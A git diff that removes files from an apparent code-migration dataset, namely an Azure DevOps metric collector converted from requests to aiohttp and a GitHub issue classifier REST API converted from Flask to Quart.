6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/source_collectors/azure_devops.py - +++ b/components/collector/src/source_collectors/api_source_collectors/azure_devops.py -@@ -6,14 +6,14 @@ See https://docs.microsoft.com/en-gb/rest/api/azure/devops/?view=azure-devops-re - - from abc import ABC - from datetime import datetime --from typing import cast, Final, List, Tuple -+from typing import cast, Any, Dict, Final, List, Tuple - - from dateutil.parser import parse --import requests -+import aiohttp - - from collector_utilities.functions import days_ago, match_string_or_regular_expression - from collector_utilities.type import Entities, Job, Response, Responses, URL, Value --from .source_collector import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector -+from base_collectors import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector - - - class AzureDevopsIssues(SourceCollector): -@@ -22,43 +22,44 @@ class AzureDevopsIssues(SourceCollector): - MAX_IDS_PER_WORK_ITEMS_API_CALL: Final[int] = 200 # See - # https://docs.microsoft.com/en-us/rest/api/azure/devops/wit/work%20items/list?view=azure-devops-rest-5.1 - -- def _api_url(self) -> URL: -- return URL(f"{super()._api_url()}/_apis/wit/wiql?api-version=4.1") -+ async def _api_url(self) -> URL: -+ return URL(f"{await super()._api_url()}/_apis/wit/wiql?api-version=4.1") - -- def _get_source_responses(self, api_url: URL) -> Responses: -+ async def _get_source_responses(self, *urls: URL) -> Responses: - """Override because we need to do a post request and need to separately get the entities.""" -- auth = self._basic_auth_credentials() -- response = requests.post(api_url, timeout=self.TIMEOUT, auth=auth, json=dict(query=self._parameter("wiql"))) -- ids = [str(work_item["id"]) for work_item in response.json().get("workItems", [])] -+ auth = aiohttp.BasicAuth(str(self._parameter("private_token"))) -+ response = await self._session.post(urls[0], auth=auth, json=dict(query=self._parameter("wiql"))) -+ ids = [str(work_item["id"]) for work_item in (await response.json()).get("workItems", [])] - if not ids: - return [response] - ids_string = ",".join(ids[:min(self.MAX_IDS_PER_WORK_ITEMS_API_CALL, self.MAX_ENTITIES)]) -- work_items_url = URL(f"{super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") -- return [response, requests.get(work_items_url, timeout=self.TIMEOUT, auth=auth)] -+ work_items_url = URL(f"{await super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") -+ work_items = await super()._get_source_responses(work_items_url) -+ return [response] + work_items - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -- value = str(len(responses[0].json()["workItems"])) -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ value = str(len((await responses[0].json())["workItems"])) - entities = [ - dict( - key=str(work_item["id"]), project=work_item["fields"]["System.TeamProject"], - title=work_item["fields"]["System.Title"], work_item_type=work_item["fields"]["System.WorkItemType"], - state=work_item["fields"]["System.State"], url=work_item["url"]) -- for work_item in self._work_items(responses)] -+ for work_item in await self._work_items(responses)] - return value, "100", entities - - @staticmethod -- def _work_items(responses: Responses): -+ async def _work_items(responses: Responses): - """Return the work items, if any.""" -- return responses[1].json()["value"] if len(responses) > 1 else [] -+ return (await responses[1].json())["value"] if len(responses) > 1 else [] - - - class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - """Collector to get ready user story points from Azure Devops Server.""" - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -- _, total, entities = super()._parse_source_responses(responses) -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ _, total, entities = await super()._parse_source_responses(responses) - value = 0 -- for entity, work_item in zip(entities, self._work_items(responses)): -+ for entity, work_item in zip(entities, await self._work_items(responses)): - entity["story_points"] = story_points = work_item["fields"].get("Microsoft.VSTS.Scheduling.StoryPoints") - value += 0 if story_points is None else story_points - return str(round(value)), total, entities -@@ -67,30 +68,29 @@ class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - class AzureDevopsRepositoryBase(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for Azure DevOps collectors that work with repositories.""" - -- def _repository_id(self) -> str: -+ async def _repository_id(self) -> str: - """Return the repository id belonging to the repository.""" -- api_url = str(super()._api_url()) -+ api_url = str(await super()._api_url()) - repository = self._parameter("repository") or api_url.rsplit("/", 1)[-1] -- repositories_url = f"{api_url}/_apis/git/repositories?api-version=4.1" -- repositories = requests.get(repositories_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials()) -- repositories.raise_for_status() -- return str([r for r in repositories.json()["value"] if repository in (r["name"], r["id"])][0]["id"]) -+ repositories_url = URL(f"{api_url}/_apis/git/repositories?api-version=4.1") -+ repositories = (await (await super()._get_source_responses(repositories_url))[0].json())["value"] -+ return str([r for r in repositories if repository in (r["name"], r["id"])][0]["id"]) - - - class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRepositoryBase): - """Collector for unmerged branches.""" - -- def _api_url(self) -> URL: -- api_url = str(super()._api_url()) -- return URL(f"{api_url}/_apis/git/repositories/{self._repository_id()}/stats/branches?api-version=4.1") -+ async def _api_url(self) -> URL: -+ api_url = str(await super()._api_url()) -+ return URL(f"{api_url}/_apis/git/repositories/{await self._repository_id()}/stats/branches?api-version=4.1") - -- def _landing_url(self, responses: Responses) -> URL: -- landing_url = str(super()._landing_url(responses)) -+ async def _landing_url(self, responses: Responses) -> URL: -+ landing_url = str(await super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - return URL(f"{landing_url}/_git/{repository}/branches") - -- def _unmerged_branches(self, responses: Responses) -> List: -- return [branch for branch in responses[0].json()["value"] if not branch["isBaseVersion"] and -+ async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: -+ return [branch for branch in (await responses[0].json())["value"] if not branch["isBaseVersion"] and - int(branch["aheadCount"]) > 0 and - days_ago(self._commit_datetime(branch)) > int(cast(str, self._parameter("inactive_days"))) and - not match_string_or_regular_expression(branch["name"], self._parameter("branches_to_ignore"))] -@@ -102,35 +102,36 @@ class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRe - class AzureDevopsSourceUpToDateness(SourceUpToDatenessCollector, AzureDevopsRepositoryBase): - """Collector class to measure the up-to-dateness of a repo or folder/file in a repo.""" - -- def _api_url(self) -> URL: -- api_url = str(super()._api_url()) -- repository_id = self._repository_id() -+ async def _api_url(self) -> URL: -+ api_url = str(await super()._api_url()) -+ repository_id = await self._repository_id() - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - search_criteria = \ - f"searchCriteria.itemPath={path}&searchCriteria.itemVersion.version={branch}&searchCriteria.$top=1" - return URL(f"{api_url}/_apis/git/repositories/{repository_id}/commits?{search_criteria}&api-version=4.1") - -- def _landing_url(self, responses: Responses) -> URL: -- landing_url = str(super()._landing_url(responses)) -+ async def _landing_url(self, responses: Responses) -> URL: -+ landing_url = str(await super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - return URL(f"{landing_url}/_git/{repository}?path={path}&version=GB{branch}") - -- def _parse_source_response_date_time(self, response: Response) -> datetime: -- return parse(response.json()["value"][0]["committer"]["date"]) -+ async def _parse_source_response_date_time(self, response: Response) -> datetime: -+ return parse((await response.json())["value"][0]["committer"]["date"]) - - - class AzureDevopsTests(SourceCollector): - """Collector for the tests metric.""" - -- def _api_url(self) -> URL: -- return URL(f"{super()._api_url()}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") -+ async def _api_url(self) -> URL: -+ api_url = await super()._api_url() -+ return URL(f"{api_url}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - test_results = cast(List[str], self._parameter("test_result")) -- runs = responses[0].json().get("value", []) -+ runs = (await responses[0].json()).get("value", []) - test_count, highest_build_nr_seen = 0, 0 - for run in runs: - build_nr = int(run.get("build", {}).get("id", "-1")) -@@ -143,18 +144,18 @@ class AzureDevopsTests(SourceCollector): - return str(test_count), "100", [] - - --class AxureDevopsJobs(SourceCollector): -+class AzureDevopsJobs(SourceCollector): - """Base class for job collectors.""" - -- def _api_url(self) -> URL: -- return URL(f"{super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") -+ async def _api_url(self) -> URL: -+ return URL(f"{await super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") - -- def _landing_url(self, responses: Responses) -> URL: -- return URL(f"{super()._api_url()}/_build") -+ async def _landing_url(self, responses: Responses) -> URL: -+ return URL(f"{await super()._api_url()}/_build") - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities: Entities = [] -- for job in responses[0].json()["value"]: -+ for job in (await responses[0].json())["value"]: - if self._ignore_job(job): - continue - name = self.__job_name(job) -@@ -190,7 +191,7 @@ class AxureDevopsJobs(SourceCollector): - return "/".join(job["path"].strip(r"\\").split(r"\\") + [job["name"]]).strip("/") - - --class AzureDevopsFailedJobs(AxureDevopsJobs): -+class AzureDevopsFailedJobs(AzureDevopsJobs): - """Collector for the failed jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: -@@ -199,7 +200,7 @@ class AzureDevopsFailedJobs(AxureDevopsJobs): - return self._latest_build_result(job) not in self._parameter("failure_type") - - --class AzureDevopsUnusedJobs(AxureDevopsJobs): -+class AzureDevopsUnusedJobs(AzureDevopsJobs): - """Collector for the unused jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py deleted file mode 100644 index 05f769d..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py +++ /dev/null @@ -1,210 +0,0 @@ -"""Azure Devops Server metric collector. - -Where possible we use version 4.1 of the API so we can support TFS 2018 and newer. -See https://docs.microsoft.com/en-gb/rest/api/azure/devops/?view=azure-devops-rest-4.1#api-and-tfs-version-mapping -""" - -from abc import ABC -from datetime import datetime -from typing import cast, Final, List, Tuple - -from dateutil.parser import parse -import requests - -from collector_utilities.functions import days_ago, match_string_or_regular_expression -from collector_utilities.type import Entities, Job, Response, Responses, URL, Value -from .source_collector import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector - - -class AzureDevopsIssues(SourceCollector): - """Collector to get issues from Azure Devops Server.""" - - MAX_IDS_PER_WORK_ITEMS_API_CALL: Final[int] = 200 # See - # https://docs.microsoft.com/en-us/rest/api/azure/devops/wit/work%20items/list?view=azure-devops-rest-5.1 - - def _api_url(self) -> URL: - return URL(f"{super()._api_url()}/_apis/wit/wiql?api-version=4.1") - - def _get_source_responses(self, api_url: URL) -> Responses: - """Override because we need to do a post request and need to separately get the entities.""" - auth = self._basic_auth_credentials() - response = requests.post(api_url, timeout=self.TIMEOUT, auth=auth, json=dict(query=self._parameter("wiql"))) - ids = [str(work_item["id"]) for work_item in response.json().get("workItems", [])] - if not ids: - return [response] - ids_string = ",".join(ids[:min(self.MAX_IDS_PER_WORK_ITEMS_API_CALL, self.MAX_ENTITIES)]) - work_items_url = URL(f"{super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") - return [response, requests.get(work_items_url, timeout=self.TIMEOUT, auth=auth)] - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - value = str(len(responses[0].json()["workItems"])) - entities = [ - dict( - key=str(work_item["id"]), project=work_item["fields"]["System.TeamProject"], - title=work_item["fields"]["System.Title"], work_item_type=work_item["fields"]["System.WorkItemType"], - state=work_item["fields"]["System.State"], url=work_item["url"]) - for work_item in self._work_items(responses)] - return value, "100", entities - - @staticmethod - def _work_items(responses: Responses): - """Return the work items, if any.""" - return responses[1].json()["value"] if len(responses) > 1 else [] - - -class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - """Collector to get ready user story points from Azure Devops Server.""" - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - _, total, entities = super()._parse_source_responses(responses) - value = 0 - for entity, work_item in zip(entities, self._work_items(responses)): - entity["story_points"] = story_points = work_item["fields"].get("Microsoft.VSTS.Scheduling.StoryPoints") - value += 0 if story_points is None else story_points - return str(round(value)), total, entities - - -class AzureDevopsRepositoryBase(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for Azure DevOps collectors that work with repositories.""" - - def _repository_id(self) -> str: - """Return the repository id belonging to the repository.""" - api_url = str(super()._api_url()) - repository = self._parameter("repository") or api_url.rsplit("/", 1)[-1] - repositories_url = f"{api_url}/_apis/git/repositories?api-version=4.1" - repositories = requests.get(repositories_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials()) - repositories.raise_for_status() - return str([r for r in repositories.json()["value"] if repository in (r["name"], r["id"])][0]["id"]) - - -class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRepositoryBase): - """Collector for unmerged branches.""" - - def _api_url(self) -> URL: - api_url = str(super()._api_url()) - return URL(f"{api_url}/_apis/git/repositories/{self._repository_id()}/stats/branches?api-version=4.1") - - def _landing_url(self, responses: Responses) -> URL: - landing_url = str(super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - return URL(f"{landing_url}/_git/{repository}/branches") - - def _unmerged_branches(self, responses: Responses) -> List: - return [branch for branch in responses[0].json()["value"] if not branch["isBaseVersion"] and - int(branch["aheadCount"]) > 0 and - days_ago(self._commit_datetime(branch)) > int(cast(str, self._parameter("inactive_days"))) and - not match_string_or_regular_expression(branch["name"], self._parameter("branches_to_ignore"))] - - def _commit_datetime(self, branch) -> datetime: - return parse(branch["commit"]["committer"]["date"]) - - -class AzureDevopsSourceUpToDateness(SourceUpToDatenessCollector, AzureDevopsRepositoryBase): - """Collector class to measure the up-to-dateness of a repo or folder/file in a repo.""" - - def _api_url(self) -> URL: - api_url = str(super()._api_url()) - repository_id = self._repository_id() - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - search_criteria = \ - f"searchCriteria.itemPath={path}&searchCriteria.itemVersion.version={branch}&searchCriteria.$top=1" - return URL(f"{api_url}/_apis/git/repositories/{repository_id}/commits?{search_criteria}&api-version=4.1") - - def _landing_url(self, responses: Responses) -> URL: - landing_url = str(super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - return URL(f"{landing_url}/_git/{repository}?path={path}&version=GB{branch}") - - def _parse_source_response_date_time(self, response: Response) -> datetime: - return parse(response.json()["value"][0]["committer"]["date"]) - - -class AzureDevopsTests(SourceCollector): - """Collector for the tests metric.""" - - def _api_url(self) -> URL: - return URL(f"{super()._api_url()}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - test_results = cast(List[str], self._parameter("test_result")) - runs = responses[0].json().get("value", []) - test_count, highest_build_nr_seen = 0, 0 - for run in runs: - build_nr = int(run.get("build", {}).get("id", "-1")) - if build_nr < highest_build_nr_seen: - continue - if build_nr > highest_build_nr_seen: - highest_build_nr_seen = build_nr - test_count = 0 - test_count += sum(run.get(test_result, 0) for test_result in test_results) - return str(test_count), "100", [] - - -class AxureDevopsJobs(SourceCollector): - """Base class for job collectors.""" - - def _api_url(self) -> URL: - return URL(f"{super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") - - def _landing_url(self, responses: Responses) -> URL: - return URL(f"{super()._api_url()}/_build") - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities: Entities = [] - for job in responses[0].json()["value"]: - if self._ignore_job(job): - continue - name = self.__job_name(job) - url = job["_links"]["web"]["href"] - build_status = self._latest_build_result(job) - build_date_time = self._latest_build_date_time(job) - entities.append( - dict(name=name, key=name, url=url, - build_date=str(build_date_time.date()), - build_age=str(days_ago(build_date_time)), - build_status=build_status)) - return str(len(entities)), "100", entities - - def _ignore_job(self, job: Job) -> bool: - """Return whether this job should be ignored""" - if not job.get("latestCompletedBuild", {}).get("result"): - return True # The job has no completed builds - return match_string_or_regular_expression(self.__job_name(job), self._parameter("jobs_to_ignore")) - - @staticmethod - def _latest_build_result(job: Job) -> str: - """Return the result of the latest build.""" - return str(job["latestCompletedBuild"]["result"]) - - @staticmethod - def _latest_build_date_time(job: Job) -> datetime: - """Return the finish time of the latest build of the job.""" - return parse(job["latestCompletedBuild"]["finishTime"]) - - @staticmethod - def __job_name(job: Job) -> str: - """Return the job name.""" - return "/".join(job["path"].strip(r"\\").split(r"\\") + [job["name"]]).strip("/") - - -class AzureDevopsFailedJobs(AxureDevopsJobs): - """Collector for the failed jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - return self._latest_build_result(job) not in self._parameter("failure_type") - - -class AzureDevopsUnusedJobs(AxureDevopsJobs): - """Collector for the unused jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - max_days = int(cast(str, self._parameter("inactive_job_days"))) - actual_days = days_ago(self._latest_build_date_time(job)) - return actual_days <= max_days diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py deleted file mode 100644 index 215444b..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py +++ /dev/null @@ -1,211 +0,0 @@ -"""Azure Devops Server metric collector. - -Where possible we use version 4.1 of the API so we can support TFS 2018 and newer. -See https://docs.microsoft.com/en-gb/rest/api/azure/devops/?view=azure-devops-rest-4.1#api-and-tfs-version-mapping -""" - -from abc import ABC -from datetime import datetime -from typing import cast, Any, Dict, Final, List, Tuple - -from dateutil.parser import parse -import aiohttp - -from collector_utilities.functions import days_ago, match_string_or_regular_expression -from collector_utilities.type import Entities, Job, Response, Responses, URL, Value -from base_collectors import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector - - -class AzureDevopsIssues(SourceCollector): - """Collector to get issues from Azure Devops Server.""" - - MAX_IDS_PER_WORK_ITEMS_API_CALL: Final[int] = 200 # See - # https://docs.microsoft.com/en-us/rest/api/azure/devops/wit/work%20items/list?view=azure-devops-rest-5.1 - - async def _api_url(self) -> URL: - return URL(f"{await super()._api_url()}/_apis/wit/wiql?api-version=4.1") - - async def _get_source_responses(self, *urls: URL) -> Responses: - """Override because we need to do a post request and need to separately get the entities.""" - auth = aiohttp.BasicAuth(str(self._parameter("private_token"))) - response = await self._session.post(urls[0], auth=auth, json=dict(query=self._parameter("wiql"))) - ids = [str(work_item["id"]) for work_item in (await response.json()).get("workItems", [])] - if not ids: - return [response] - ids_string = ",".join(ids[:min(self.MAX_IDS_PER_WORK_ITEMS_API_CALL, self.MAX_ENTITIES)]) - work_items_url = URL(f"{await super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") - work_items = await super()._get_source_responses(work_items_url) - return [response] + work_items - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - value = str(len((await responses[0].json())["workItems"])) - entities = [ - dict( - key=str(work_item["id"]), project=work_item["fields"]["System.TeamProject"], - title=work_item["fields"]["System.Title"], work_item_type=work_item["fields"]["System.WorkItemType"], - state=work_item["fields"]["System.State"], url=work_item["url"]) - for work_item in await self._work_items(responses)] - return value, "100", entities - - @staticmethod - async def _work_items(responses: Responses): - """Return the work items, if any.""" - return (await responses[1].json())["value"] if len(responses) > 1 else [] - - -class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - """Collector to get ready user story points from Azure Devops Server.""" - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - _, total, entities = await super()._parse_source_responses(responses) - value = 0 - for entity, work_item in zip(entities, await self._work_items(responses)): - entity["story_points"] = story_points = work_item["fields"].get("Microsoft.VSTS.Scheduling.StoryPoints") - value += 0 if story_points is None else story_points - return str(round(value)), total, entities - - -class AzureDevopsRepositoryBase(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for Azure DevOps collectors that work with repositories.""" - - async def _repository_id(self) -> str: - """Return the repository id belonging to the repository.""" - api_url = str(await super()._api_url()) - repository = self._parameter("repository") or api_url.rsplit("/", 1)[-1] - repositories_url = URL(f"{api_url}/_apis/git/repositories?api-version=4.1") - repositories = (await (await super()._get_source_responses(repositories_url))[0].json())["value"] - return str([r for r in repositories if repository in (r["name"], r["id"])][0]["id"]) - - -class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRepositoryBase): - """Collector for unmerged branches.""" - - async def _api_url(self) -> URL: - api_url = str(await super()._api_url()) - return URL(f"{api_url}/_apis/git/repositories/{await self._repository_id()}/stats/branches?api-version=4.1") - - async def _landing_url(self, responses: Responses) -> URL: - landing_url = str(await super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - return URL(f"{landing_url}/_git/{repository}/branches") - - async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: - return [branch for branch in (await responses[0].json())["value"] if not branch["isBaseVersion"] and - int(branch["aheadCount"]) > 0 and - days_ago(self._commit_datetime(branch)) > int(cast(str, self._parameter("inactive_days"))) and - not match_string_or_regular_expression(branch["name"], self._parameter("branches_to_ignore"))] - - def _commit_datetime(self, branch) -> datetime: - return parse(branch["commit"]["committer"]["date"]) - - -class AzureDevopsSourceUpToDateness(SourceUpToDatenessCollector, AzureDevopsRepositoryBase): - """Collector class to measure the up-to-dateness of a repo or folder/file in a repo.""" - - async def _api_url(self) -> URL: - api_url = str(await super()._api_url()) - repository_id = await self._repository_id() - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - search_criteria = \ - f"searchCriteria.itemPath={path}&searchCriteria.itemVersion.version={branch}&searchCriteria.$top=1" - return URL(f"{api_url}/_apis/git/repositories/{repository_id}/commits?{search_criteria}&api-version=4.1") - - async def _landing_url(self, responses: Responses) -> URL: - landing_url = str(await super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - return URL(f"{landing_url}/_git/{repository}?path={path}&version=GB{branch}") - - async def _parse_source_response_date_time(self, response: Response) -> datetime: - return parse((await response.json())["value"][0]["committer"]["date"]) - - -class AzureDevopsTests(SourceCollector): - """Collector for the tests metric.""" - - async def _api_url(self) -> URL: - api_url = await super()._api_url() - return URL(f"{api_url}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - test_results = cast(List[str], self._parameter("test_result")) - runs = (await responses[0].json()).get("value", []) - test_count, highest_build_nr_seen = 0, 0 - for run in runs: - build_nr = int(run.get("build", {}).get("id", "-1")) - if build_nr < highest_build_nr_seen: - continue - if build_nr > highest_build_nr_seen: - highest_build_nr_seen = build_nr - test_count = 0 - test_count += sum(run.get(test_result, 0) for test_result in test_results) - return str(test_count), "100", [] - - -class AzureDevopsJobs(SourceCollector): - """Base class for job collectors.""" - - async def _api_url(self) -> URL: - return URL(f"{await super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") - - async def _landing_url(self, responses: Responses) -> URL: - return URL(f"{await super()._api_url()}/_build") - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities: Entities = [] - for job in (await responses[0].json())["value"]: - if self._ignore_job(job): - continue - name = self.__job_name(job) - url = job["_links"]["web"]["href"] - build_status = self._latest_build_result(job) - build_date_time = self._latest_build_date_time(job) - entities.append( - dict(name=name, key=name, url=url, - build_date=str(build_date_time.date()), - build_age=str(days_ago(build_date_time)), - build_status=build_status)) - return str(len(entities)), "100", entities - - def _ignore_job(self, job: Job) -> bool: - """Return whether this job should be ignored""" - if not job.get("latestCompletedBuild", {}).get("result"): - return True # The job has no completed builds - return match_string_or_regular_expression(self.__job_name(job), self._parameter("jobs_to_ignore")) - - @staticmethod - def _latest_build_result(job: Job) -> str: - """Return the result of the latest build.""" - return str(job["latestCompletedBuild"]["result"]) - - @staticmethod - def _latest_build_date_time(job: Job) -> datetime: - """Return the finish time of the latest build of the job.""" - return parse(job["latestCompletedBuild"]["finishTime"]) - - @staticmethod - def __job_name(job: Job) -> str: - """Return the job name.""" - return "/".join(job["path"].strip(r"\\").split(r"\\") + [job["name"]]).strip("/") - - -class AzureDevopsFailedJobs(AzureDevopsJobs): - """Collector for the failed jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - return self._latest_build_result(job) not in self._parameter("failure_type") - - -class AzureDevopsUnusedJobs(AzureDevopsJobs): - """Collector for the unused jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - max_days = int(cast(str, self._parameter("inactive_job_days"))) - actual_days = days_ago(self._latest_build_date_time(job)) - return actual_days <= max_days diff --git a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff b/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff deleted file mode 100644 index 3ee5b4d..0000000 --- a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff +++ /dev/null @@ -1,72 +0,0 @@ -diff --git a/github-issue-classification/python/rest.py b/github-issue-classification/python/rest.py - index ce8ab128833092a58c176083c2efb6bbfd65ed37..22cc3f007a3267ca09a3f53b84fdbfff1f045e88 100644 - --- a/github-issue-classification/python/rest.py - +++ b/github-issue-classification/python/rest.py -@@ -16,39 +16,46 @@ - # limitations under the License. - # - """a rest api for github issue classification""" --import flask --from flask_cors import CORS -+import quart -+ -+from quart import Quart -+from quart_cors import cors -+ - from infer import infer - --app = flask.Flask("github issue classifier") --CORS(app) - --banner = {"what": "github issue classifier", -- "usage": { -- "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' }' http://localhost:5059/github_issues/infer", -- "server": "docker run -d -p 5000:5000 stacks_img_recog" -- } -- } -+app = Quart(__name__) -+cors(app) -+ -+banner = { -+ "what": "github issue classifier", -+ "usage": { -+ "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' }' http://localhost:5059/github_issues/infer", -+ "server": "docker run -d -p 5000:5000 stacks_img_recog", -+ }, -+} - - --@app.route('/github_issues/', methods=["GET"]) --def index(): -- return flask.jsonify(banner), 201 -+@app.route("/", methods=["get"]) -+@app.route("/index", methods=["get"]) -+@app.route("/github_issues", methods=["get"]) -+async def index(): -+ return quart.jsonify(banner), 201 - - --@app.route('/github_issues/infer', methods=["POST"]) --def pred(): -+@app.route("/github_issues/infer", methods=["POST"]) -+async def pred(): - issue = list() -- issue.append(flask.request.json["issue"]) -- if not flask.request.json or not "issue" in flask.request.json: -- flask.abort(400) -+ issue.append(quart.request.json["issue"]) -+ if not quart.request.json or not "issue" in quart.request.json: -+ quart.abort(400) - labels = infer(issue) -- return flask.jsonify({"label": labels}), 201 -+ return quart.jsonify({"label": labels}), 201 - - - @app.errorhandler(404) --def not_found(error): -- return flask.make_response(flask.jsonify({"error": "Not found"}), 404) -+async def not_found(error): -+ return quart.make_response(quart.jsonify({"error": "Not found"}), 404) - - - if __name__ == "__main__": diff --git a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py b/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py deleted file mode 100644 index c6b2076..0000000 --- a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py +++ /dev/null @@ -1,55 +0,0 @@ -#!usr/bin/env python -# -# Copyright (c) 2019 Intel Corporation -# -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -"""a rest api for github issue classification""" -import flask -from flask_cors import CORS -from infer import infer - -app = flask.Flask("github issue classifier") -CORS(app) - -banner = {"what": "github issue classifier", - "usage": { - "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' }' http://localhost:5059/github_issues/infer", - "server": "docker run -d -p 5000:5000 stacks_img_recog" - } - } - - -@app.route('/github_issues/', methods=["GET"]) -def index(): - return flask.jsonify(banner), 201 - - -@app.route('/github_issues/infer', methods=["POST"]) -def pred(): - issue = list() - issue.append(flask.request.json["issue"]) - if not flask.request.json or not "issue" in flask.request.json: - flask.abort(400) - labels = infer(issue) - return flask.jsonify({"label": labels}), 201 - - -@app.errorhandler(404) -def not_found(error): - return flask.make_response(flask.jsonify({"error": "Not found"}), 404) - - -if __name__ == "__main__": - app.run(host="0.0.0.0", port=5059) diff --git 